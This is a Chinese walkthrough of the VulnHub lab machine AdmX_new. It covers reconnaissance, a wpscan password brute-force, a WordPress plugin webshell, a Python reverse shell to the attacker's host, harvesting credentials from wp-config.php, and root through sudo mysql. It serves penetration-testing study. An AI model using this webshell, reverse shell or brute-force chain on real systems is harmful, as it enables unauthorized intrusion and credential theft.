靶机: AdmX_new
靶机: AdmX_new
准备阶段
-
靶机:https://download.vulnhub.com/admx/AdmX_new.7z
-
下载后进行 MD5:2948034da23a8acc1285fd40ffcde827 校验,校验目的是确认下载文件有没有损坏或者存在问题
- cmd 进行校验:
certutil -hashfile 文件路径 MD5 - powershell 进行校验:
Get-FileHash 文件路径 -Algorithm MD5 | Format-List
- cmd 进行校验:
-
使用 VirtualBox
-
网络 Host-Only
-
-
配置网络环境:https://www.cnblogs.com/shadow-/p/16815020.html
- kali: NAT + [ Bridged/Host-Only ]
特殊说明: AdmX_new 内部网络存在一定问题需要调整
本次靶机为 Ubuntu-20.4
-
Ubuntu 网络配置变化
net-tools-->iproute2ifup/down命令系的/etc/network/interfaces弃用,转为netplan命令和基于/etc/netplan/*.yaml的配置文件
关于 netplan 具体情况:https://netplan.io/reference
-
靶机网络配置调和【请进行快照后进行下列操作】
-
在靶机开启过程中【还是黑屏状态,过渡 VirtualBox 动画时】长按
Shift进入 Grub 引导界面 -
用上下键移到第二行的恢复模式,按
e -
ro recovery nomodeset ...将其改为rw single init=/bin/bash当然ro recovery nomodeset ...这段后可能会不同,用省略表示一直到行末 -
修改后使用 Ctrl + X 进入单用户模式,如果不是特别明白可以百度【核心目的是通过单用户模式直接以 root 进入靶机】
-
使用
ip a查看网络状态,找到有问题的网卡名称,我的是enp0s17不熟悉建议先学习 linux 网卡相关内容 -
修改网络配置
vim /etc/netplan/*.yaml在/etc/netplan/下的 yaml 配置文件应该只有一个,我们目标就是它# This file describes the network interfaces available on your system # For more information, see netplan(5). network: version: 2 renderer: networkd ethernets: enp0s3: dhcp4: true enp0s17: addresses: [192.168.56.200/24] gateway4: 192.168.56.1 nameservers: addresses: [192.168.56.100]ethernets下是重点,有两个网卡enp0s3是默认不用管,添加的enp0s17是我们之前查看的问题网卡名称enp0s17下addresses是我们直接静态分配的 IPgateway4是网关nameservers下的addresses是 DHCP 服务地址
-
其中网关和 DHCP 服务地址是 VirtualBox 的 管理 --> 主机虚拟网络管理器 --> 你为靶机在 Host-Only 下使用的那一张网卡,上面有网卡和 DHCP 服务器信息
-
配置完成 yaml 配置文件后使用命令
netplan apply使配置生效
-
-
关于 Ubuntu-20.4 网络配置详解: https://ubuntu.com/server/docs/network-configuration
打靶流程
发现目标
使用 arp-scan 进行,发现目标 192.168.56.200
┌──(kali㉿kali)-[~]
└─$ sudo arp-scan -l -I eth1
Interface: eth1, type: EN10MB, MAC: 08:00:27:ad:7a:24, IPv4: 192.168.56.111
Starting arp-scan 1.9.8 with 256 hosts (https://github.com/royhills/arp-scan)
192.168.56.1 0a:00:27:00:00:0d (Unknown: locally administered)
192.168.56.100 08:00:27:53:45:e0 PCS Systemtechnik GmbH
192.168.56.200 08:00:27:a3:25:25 PCS Systemtechnik GmbH
3 packets received by filter, 0 packets dropped by kernel
Ending arp-scan 1.9.8: 256 hosts scanned in 2.144 seconds (119.40 hosts/sec). 3 responded
- 使用
-I参数指定靶机对接的网络是 eth1 需要指定扫描的接口 使用--interface=参数,此参数简写I
使用 nmap 进行端口扫描,目标靶机的 80 端口是开放的,并且服务是 Apache httpd 2.4.41 的 http 服务
┌──(kali㉿kali)-[~]
└─$ nmap -A -T4 192.168.56.200
Starting Nmap 7.93 ( https://nmap.org ) at 2022-10-31 19:30 CST
Nmap scan report for 192.168.56.200
Host is up (0.0014s latency).
Not shown: 999 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
80/tcp open http Apache httpd 2.4.41 ((Ubuntu))
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: Apache2 Ubuntu Default Page: It works
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 16.19 seconds
-A参数是用来进行操作系统及其版本的探测-T4参数是可以加快执行速度
探查靶机 http 服务
使用浏览器对 http://192.168.56.200:80/ 进行访问,会发现它只是一个 Apache httpd 2.4.41 的初始化页面,对此我们应该对 http://192.168.56.200:80/ 爬取是否存在隐藏或未知页面,对此我们使用 dirsearch 进行暴力破解网络服务器中的目录和文件
┌──(kali㉿kali)-[~]
└─$ dirsearch --url=192.168.56.200:80/
_|. _ _ _ _ _ _|_ v0.4.2
(_||| _) (/_(_|| (_| )
Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 30 | Wordlist size: 10927
Output File: /home/kali/.dirsearch/reports/80-_22-10-31_19-42-33.txt
Error Log: /home/kali/.dirsearch/logs/errors-22-10-31_19-42-33.log
Target: http://192.168.56.200:80/
[19:42:33] Starting:
[19:42:37] 403 - 279B - /.htaccess_orig
[19:42:37] 403 - 279B - /.htaccess.sample
[19:42:37] 403 - 279B - /.htaccess_extra
[19:42:37] 403 - 279B - /.ht_wsr.txt
[19:42:37] 403 - 279B - /.htaccess.orig
[19:42:37] 403 - 279B - /.htaccessBAK
[19:42:37] 403 - 279B - /.htaccess_sc
[19:42:37] 403 - 279B - /.htaccessOLD
[19:42:37] 403 - 279B - /.htaccess.bak1
[19:42:37] 403 - 279B - /.htaccess.save
[19:42:37] 403 - 279B - /.html
[19:42:37] 403 - 279B - /.htm
[19:42:37] 403 - 279B - /.htpasswd_test
[19:42:37] 403 - 279B - /.htpasswds
[19:42:37] 403 - 279B - /.htaccessOLD2
[19:42:37] 403 - 279B - /.httr-oauth
[19:42:39] 403 - 279B - /.php
[19:43:33] 200 - 11KB - /index.html
[19:44:05] 403 - 279B - /server-status/
[19:44:05] 403 - 279B - /server-status
[19:44:18] 403 - 279B - /tools/
[19:44:18] 301 - 316B - /tools -> http://192.168.56.200/tools/
[19:44:28] 200 - 7KB - /wordpress/wp-login.php
[19:44:28] 200 - 8KB - /wordpress/
Task Completed
-
发现活跃目标 200
http://192.168.56.200:80/index.htmlhttp://192.168.56.200:80/wordpress/wp-login.phphttp://192.168.56.200:80/wordpress
-
和一个特别的 301
http://192.168.56.200:80/tools
使用火狐访问 http://192.168.56.200:80/wordpress/ 发现加载时间过长,且明显有缺失,通过查看源码我们可以发现是,html 页面中存在错误指向 192.168.159.145 对此需要使用重定向或替换响应内容,下面使用方法
-
使用 Burp Suite 进行抓包修改响应实现
-
使用 浏览器插件 Redirector 重定向实现
对了此方法可以解决 googleapis 问题,是在访问外国的网站很多技术类网站还在使用 Google Apis 的服务,用过体验应该能发现那些网站存在部分缺失,原因就是国内无法访问 Google Apis 的服务,但是国内存在镜像站,通过此插件重定向就可以间接访问
-
使用 Mitmproxy 实现
我们使用 Mitmproxy 实现进行实现
- 确定你的 Kali 否安装 Mitmproxy
- 命令
mitmproxy启动,程序 - 按
ctrl + shift + d可以将 shell 伪终端上下分屏,上方是 Mitmproxy 的 TUI 界面,下方是 Bash 的 CLI 界面,此操作仅是方便你操作,如果知道请忽略 - 在 Mitmproxy 中使用
:键可以进入指令模式,使用set map_remote '|~m GET|//192.168.159.145/|//192.168.56.200/'即可完成重定向 - 在 firefox 中使用代理:
手动代理 --> HTTP 代理代理 IP 地址127.0.0.1:8080 - 再次访问
http://192.168.56.200:80/wordpress/
经过一番探索,发现并没有什么特别的,我们使用 dirsearch 对 http://192.168.56.200:80/wordpress/ 进行爆破
┌──(kali㉿kali)-[~/.mitmproxy]
└─$ dirsearch --url=192.168.56.200:80/wordpress
_|. _ _ _ _ _ _|_ v0.4.2
(_||| _) (/_(_|| (_| )
Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 30 | Wordlist size: 10927
Output File: /home/kali/.dirsearch/reports/80-wordpress_22-11-01_12-33-29.txt
Error Log: /home/kali/.dirsearch/logs/errors-22-11-01_12-33-29.log
Target: http://192.168.56.200:80/wordpress/
[12:33:30] Starting:
[12:33:40] 403 - 279B - /wordpress/.ht_wsr.txt
[12:33:41] 403 - 279B - /wordpress/.htaccess.sample
[12:33:41] 403 - 279B - /wordpress/.htaccess.orig
[12:33:41] 403 - 279B - /wordpress/.htaccess.bak1
[12:33:41] 403 - 279B - /wordpress/.htaccess_extra
[12:33:41] 403 - 279B - /wordpress/.htaccess.save
[12:33:41] 403 - 279B - /wordpress/.htaccess_orig
[12:33:41] 403 - 279B - /wordpress/.htaccessOLD
[12:33:41] 403 - 279B - /wordpress/.htaccess_sc
[12:33:41] 403 - 279B - /wordpress/.htaccessOLD2
[12:33:41] 403 - 279B - /wordpress/.htaccessBAK
[12:33:41] 403 - 279B - /wordpress/.htm
[12:33:41] 403 - 279B - /wordpress/.httr-oauth
[12:33:41] 403 - 279B - /wordpress/.htpasswd_test
[12:33:41] 403 - 279B - /wordpress/.htpasswds
[12:33:41] 403 - 279B - /wordpress/.html
[12:33:46] 403 - 279B - /wordpress/.php
[12:33:55] 301 - 0B - /wordpress/0 -> http://192.168.56.200/wordpress/0/
[12:34:05] 301 - 0B - /wordpress/Citrix//AccessPlatform/auth/clientscripts/cookies.js -> http://192.168.56.200/wordpress/Citrix/AccessPlatform/auth/clientscripts/cookies.js
[12:34:09] 301 - 0B - /wordpress/New%20folder%20(2) -> http://192.168.56.200/wordpress/New%20folder%20(2
[12:34:09] 301 - 0B - /wordpress/PMA2/index.php -> http://192.168.56.200/wordpress/PMA2/
[12:34:10] 301 - 0B - /wordpress/PMA/index.php -> http://192.168.56.200/wordpress/PMA/
[12:34:28] 301 - 0B - /wordpress/adm/index.php -> http://192.168.56.200/wordpress/adm/
[12:34:29] 302 - 0B - /wordpress/admin -> http://192.168.159.145/wordpress/wp-admin/
[12:34:30] 301 - 0B - /wordpress/admin. -> http://192.168.56.200/wordpress/admin
[12:34:31] 302 - 0B - /wordpress/admin/ -> http://192.168.159.145/wordpress/wp-admin/
[12:34:32] 301 - 0B - /wordpress/admin/index.php -> http://192.168.56.200/wordpress/admin/
[12:34:33] 301 - 0B - /wordpress/admin/mysql/index.php -> http://192.168.56.200/wordpress/admin/mysql/
[12:34:33] 301 - 0B - /wordpress/admin/mysql2/index.php -> http://192.168.56.200/wordpress/admin/mysql2/
... ... ...
... ... ...
[12:38:02] 301 - 0B - /wordpress/wp-register.php -> http://192.168.159.145/wordpress/wp-login.php?action=register
[12:38:02] 200 - 630B - /wordpress/wp-json/wp/v2/users/
[12:38:02] 200 - 96KB - /wordpress/wp-json/
[12:38:02] 302 - 0B - /wordpress/wp-signup.php -> http://192.168.159.145/wordpress/wp-login.php?action=register
[12:38:02] 200 - 49KB - /wordpress/wp-includes/
[12:38:02] 301 - 0B - /wordpress/www/phpMyAdmin/index.php -> http://192.168.56.200/wordpress/www/phpMyAdmin/
[12:38:03] 301 - 0B - /wordpress/xampp/phpmyadmin/index.php -> http://192.168.56.200/wordpress/xampp/phpmyadmin/
[12:38:03] 405 - 42B - /wordpress/xmlrpc.php
- 显然这次大发现,重点关注
200、301状态的内容 - 在此处需要对 WordPress 有一定了解,才能快速反应出应该重点盘查那些内容
- 重点是
/wordpress/wp-login.php的登录界面,登录的是后台管理
此处我们使用针对 WordPress 的工具 wpscan 攻击 http://192.168.56.200/wordpress/ 注意使用 wpscan 需要挂代理
──(kali㉿kali)-[~/workspace]
└─$ wpscan --url http://192.168.56.200/wordpress/ --proxy http://127.0.0.1:8080 1 ⨯
_______________________________________________________________
__ _______ _____
\ \ / / __ \ / ____|
\ \ /\ / /| |__) | (___ ___ __ _ _ __ ®
\ \/ \/ / | ___/ \___ \ / __|/ _` | '_ \
\ /\ / | | ____) | (__| (_| | | | |
\/ \/ |_| |_____/ \___|\__,_|_| |_|
WordPress Security Scanner by the WPScan Team
Version 3.8.22
Sponsored by Automattic - https://automattic.com/
@_WPScan_, @ethicalhack3r, @erwan_lr, @firefart
_______________________________________________________________
[+] URL: http://192.168.56.200/wordpress/ [192.168.56.200]
[+] Started: Tue Nov 1 20:20:27 2022
Interesting Finding(s):
[+] Headers
| Interesting Entry: Server: Apache/2.4.41 (Ubuntu)
| Found By: Headers (Passive Detection)
| Confidence: 100%
[+] XML-RPC seems to be enabled: http://192.168.56.200/wordpress/xmlrpc.php
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%
| References:
| - http://codex.wordpress.org/XML-RPC_Pingback_API
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_ghost_scanner/
| - https://www.rapid7.com/db/modules/auxiliary/dos/http/wordpress_xmlrpc_dos/
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_xmlrpc_login/
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_pingback_access/
[+] WordPress readme found: http://192.168.56.200/wordpress/readme.html
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%
[+] Upload directory has listing enabled: http://192.168.56.200/wordpress/wp-content/uploads/
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%
[+] The external WP-Cron seems to be enabled: http://192.168.56.200/wordpress/wp-cron.php
| Found By: Direct Access (Aggressive Detection)
| Confidence: 60%
| References:
| - https://www.iplocation.net/defend-wordpress-from-ddos
| - https://github.com/wpscanteam/wpscan/issues/1299
[+] WordPress version 5.7.1 identified (Insecure, released on 2021-04-15).
| Found By: Emoji Settings (Passive Detection)
| - http://192.168.56.200/wordpress/, Match: 'wp-includes\/js\/wp-emoji-release.min.js?ver=5.7.1'
| Confirmed By: Meta Generator (Passive Detection)
| - http://192.168.56.200/wordpress/, Match: 'WordPress 5.7.1'
[i] The main theme could not be detected.
[+] Enumerating All Plugins (via Passive Methods)
[i] No plugins Found.
[+] Enumerating Config Backups (via Passive and Aggressive Methods)
Checking Config Backups - Time: 00:00:08 <==============================================> (137 / 137) 100.00% Time: 00:00:08
[i] No Config Backups Found.
[!] No WPScan API Token given, as a result vulnerability data has not been output.
[!] You can get a free API token with 25 daily requests by registering at https://wpscan.com/register
[+] Finished: Tue Nov 1 20:20:46 2022
[+] Requests Done: 164
[+] Cached Requests: 4
[+] Data Sent: 53.828 KB
[+] Data Received: 106.023 KB
[+] Memory used: 193.719 MB
[+] Elapsed time: 00:00:19
- 挂代理是因为之前服务器重定向原因
- 我们发现 WordPress 版本是 version 5.7.1
测试 wpscan 能正常工作后,使用如下命令工具 wpscan --url http://192.168.56.200/wordpress/ -P ./password.txt -U admin --proxy http://127.0.0.1:8080 爆破 WordPress 后台密码
┌──(kali㉿kali)-[~/workspace]
└─$ wpscan --url http://192.168.56.200/wordpress/ -P ./password.txt -U admin --proxy http://127.0.0.1:8080
_______________________________________________________________
__ _______ _____
\ \ / / __ \ / ____|
\ \ /\ / /| |__) | (___ ___ __ _ _ __ ®
\ \/ \/ / | ___/ \___ \ / __|/ _` | '_ \
\ /\ / | | ____) | (__| (_| | | | |
\/ \/ |_| |_____/ \___|\__,_|_| |_|
WordPress Security Scanner by the WPScan Team
Version 3.8.22
Sponsored by Automattic - https://automattic.com/
@_WPScan_, @ethicalhack3r, @erwan_lr, @firefart
_______________________________________________________________
[proxychains] Strict chain ... 127.0.0.1:8080 ... 192.168.56.200:80 ... OK
[+] URL: http://192.168.56.200/wordpress/ [192.168.56.200]
[+] Started: Tue Nov 1 18:41:55 2022
Interesting Finding(s):
[+] Headers
| Interesting Entry: Server: Apache/2.4.41 (Ubuntu)
| Found By: Headers (Passive Detection)
| Confidence: 100%
[+] XML-RPC seems to be enabled: http://192.168.56.200/wordpress/xmlrpc.php
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%
| References:
| - http://codex.wordpress.org/XML-RPC_Pingback_API
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_ghost_scanner/
| - https://www.rapid7.com/db/modules/auxiliary/dos/http/wordpress_xmlrpc_dos/
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_xmlrpc_login/
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_pingback_access/
[+] WordPress readme found: http://192.168.56.200/wordpress/readme.html
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%
[+] Upload directory has listing enabled: http://192.168.56.200/wordpress/wp-content/uploads/
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%
[+] The external WP-Cron seems to be enabled: http://192.168.56.200/wordpress/wp-cron.php
| Found By: Direct Access (Aggressive Detection)
| Confidence: 60%
| References:
| - https://www.iplocation.net/defend-wordpress-from-ddos
| - https://github.com/wpscanteam/wpscan/issues/1299
[+] WordPress version 5.7.1 identified (Insecure, released on 2021-04-15).
| Found By: Emoji Settings (Passive Detection)
| - http://192.168.56.200/wordpress/, Match: 'wp-includes\/js\/wp-emoji-release.min.js?ver=5.7.1'
| Confirmed By: Meta Generator (Passive Detection)
| - http://192.168.56.200/wordpress/, Match: 'WordPress 5.7.1'
[i] The main theme could not be detected.
[+] Enumerating All Plugins (via Passive Methods)
[i] No plugins Found.
[+] Enumerating Config Backups (via Passive and Aggressive Methods)
Checking Config Backups - Time: 00:00:04 <==============================================> (137 / 137) 100.00% Time: 00:00:04
[i] No Config Backups Found.
[SUCCESS] - admin / adam14
Trying admin / Adm123 Time: 00:00:01 <==== > (20 / 236) 8.47% ETA: ??:??:??
[!] Valid Combinations Found:
| Username: admin, Password: adam14
[!] No WPScan API Token given, as a result vulnerability data has not been output.
[!] You can get a free API token with 25 daily requests by registering at https://wpscan.com/register
[+] Finished: Tue Nov 1 18:42:07 2022
[+] Requests Done: 160
[+] Cached Requests: 30
[+] Data Sent: 49.889 KB
[+] Data Received: 61.955 KB
[+] Memory used: 204.188 MB
[+] Elapsed time: 00:00:12
-
解析命令
proxychains wpscan --url http://192.168.56.200/wordpress/ -P ./password.txt -U admin- proxychains 是代理,这个应该理解
-P参数是爆破密码字典,./password.txt是密码字典-U参数是爆破账号,我们指定用户为admin毕竟我们要管理权
-
通过爆破发现关键内容密码为
adam14[!] Valid Combinations Found: | Username: admin, Password: adam14
对于密码字典
- 建议通过网络查找 高质量弱密码字典
- 使用字典生成工具
john,hydra,crunch手动生成 字典量级都比较大- 或 Kali 的自带字典【一般有点差强人意】
上面的爆破流程也可以使用 john , hydra 进行但更佳复杂,使用 wpscan 是针对性攻击,对于渗透时根据目标类型使用针对性的攻击能够更高效
对 WordPress 后台页面攻击方法
目前已知 WordPress 版本是 version 5.7.1 且我们进入其后台管理界面
- media 标签 上传木马
- Appearance -> Theme Editor 标签 404 模板页面注入
- 基于 WordPress 插件攻击
在此我们选择 WordPress 插件攻击,因为操作空间更灵活一些
-
编写插件,并上传安装到 WordPress 激活
<?php /* Plugin Name: WebShell Plugin URI: https://yunju.blog.csdn.net/ Description: mu Author: myname Version: 1.0 Author URI: https://yunju.blog.csdn.net/ */ if(isset($_GET['cmd'])){ system($_GET['cmd']); } ?> ?> -
在浏览器访问
http://192.168.56.200/wordpress/wp-content/plugins/shell.php?cmd=id测试 -
在本地开启对映监听
netcat -nvlp 4444 -
经过测试上面存在
python3 -
尝试使用 Python 反弹 shell
import os,subprocess,socket # 创建套接字 s=socket.socket(socket.AF_INET,socket.SOCK_STREAM) # socket.AF_INET代表使用IPv4协议,socket.SOCK_STREAM 代表使用面向流的Tcp协议 # 创建通信 s.connect(('192.168.56.111', 4444)) # 重定向,保障通信的输入与输出 os.dup2(s.fileno(),0) os.dup2(s.fileno(),1) os.dup2(s.fileno(),2) # 生成反弹的 shell p=subprocess.call(["/bin/sh","-i"]) # 使用时压缩上面的代码,以便 exec() 执行 import os,subprocess,socket;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.56.111",4444));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);构建
python3 -c 'import os,subprocess,socket;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.56.111",4444));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);' -
替代
id进行执行
也可以使用 metasploit-framework 进行攻击
┌──(kali㉿kali)-[~/workspace]
└─$ netcat -nlvp 4444 1 ⨯
listening on [any] 4444 ...
connect to [192.168.56.111] from (UNKNOWN) [192.168.56.200] 36466
bash: cannot set terminal process group (990): Inappropriate ioctl for device
bash: no job control in this shell
www-data@wp:/var/www/html/wordpress/wp-content/plugins/shell$
提权
先确定系统信息,使用命令 uname -a
www-data@wp:/var/www/html/wordpress$ uname -a
uname -a
Linux wp 5.4.0-72-generic #80-Ubuntu SMP Mon Apr 12 17:35:00 UTC 2021 x86_64 x86_64 x86_64 GNU/Linux
既然攻击 WordPress 一定不要忘记查看其配置文件 wp-config.php
www-data@wp:/var/www/html/wordpress$ cat wp-config.php
cat wp-config.php
<?php
define( 'DB_NAME', 'wordpress' );
define( 'DB_USER', 'admin' );
define( 'DB_PASSWORD', 'Wp_Admin#123' );
define( 'DB_HOST', 'localhost' );
define( 'DB_CHARSET', 'utf8mb4' );
define( 'DB_COLLATE', '' );
define( 'AUTH_KEY', '-=<%h-&zmo1#bWHqHEib?bJt!)mOL7E+j{x7x;Hsc}t?xm?=kRfunrRmTUP;#8OS' );
define( 'SECURE_AUTH_KEY', 'A5#uw+^B_f:K]WNq@aoXLpD@bmMD/hev^UAf,^lTCX3@a1&7A(qLFS_{I=pYw(ET' );
define( 'LOGGED_IN_KEY', '~*TFb3]y1^|G9j%?Z@F[63A+AAT<mndFo-H{q0P#Nz/qYN3da@UXyY6YP6`7QNmy' );
define( 'NONCE_KEY', 'bP88<WoD?9;eN0yM9A{+])!$(k[zp{:-.ZS6Fk*snlJN&GXU6Zy_)wEbqk>-? nn' );
define( 'AUTH_SALT', 'SX%VenTL%k&f%i8tFAhtf#svIc|nt.&t~R%zp=:n:Q%e0Ux?k,-j?ZAjZZ%;w1ih' );
define( 'SECURE_AUTH_SALT', '-e Z<w<q8F~Tm7IeNu2nSa^or=*B?bV*yRBa+4; My}cIJ]?L%j14RWghI,D^M^5' );
define( 'LOGGED_IN_SALT', '}Z}fYC%Mv;;ON/h~$c2c,u[FZ>`YaiscN6UY&HCcXUVl{miUbX4a/ LdJ^AoL/Z{' );
define( 'NONCE_SALT', 'BQPaC,#p}PEcU^eC*Hwss>9~UCEKhv]tox~PN)?B.kSn%tC)V~pZ6RpOBR>80o5+' );
$table_prefix = 'wp_';
define( 'WP_DEBUG', false );
if ( ! defined( 'ABSPATH' ) ) {
define( 'ABSPATH', __DIR__ . '/' );
}
- 可以直接知道 MySQL 用户
admin和密码Wp_Admin#123 - 但登录会错误
我们还可以在用户目录查看 ls /home 发现一个用户 wpadmin 我们可以尝试猜测密码之前的 adam14
- 能登录,之后我们可以去
cd ~找到第一个 flag
wpadmin@wp:~$ cd ~ && ls
cd ~ && ls
local.txt
wpadmin@wp:~$ cat local.txt
cat local.txt
153495edec1b606c24947b1335998bd9
二次提权
在对 sudo -l 验证时发现,可以无条件执行 /usr/bin/mysql -u root -D wordpress -p
wpadmin@wp:~$ sudo -l
sudo -l
Matching Defaults entries for wpadmin on wp:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User wpadmin may run the following commands on wp:
(root) NOPASSWD: /usr/bin/mysql -u root -D wordpress -p
- 密码猜测依旧是
adam14 - 进入 mysql 中使用
system即可执行 root 级命令 - 在
\! /bin/bash即可使用 root 的 bash
在 root 用户目录下 proof.txt 最后一个 flag 到此打靶就结束了
